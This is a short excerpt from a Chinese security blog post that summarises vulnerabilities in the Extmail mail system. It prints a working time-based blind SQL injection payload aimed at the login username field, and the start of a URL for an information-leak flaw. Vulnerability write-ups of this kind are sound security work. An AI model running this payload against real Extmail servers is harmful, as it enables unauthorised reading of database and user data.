2020年2月19日
应用安全 - 邮件系统 - Extmail - 漏洞汇总
摘要: 前台SQL注入 payload(username处存在延迟注入):admin' AND if(ascii(substring(user(),1,1))>104,benchmark(2000000,md5(0x72696e67)),1)%23 前台敏感信息泄露 payload: http://xxx. 阅读全文
posted @ 2020-02-19 00:35 7hang 阅读(1160) 评论(0) 推荐(0) 编辑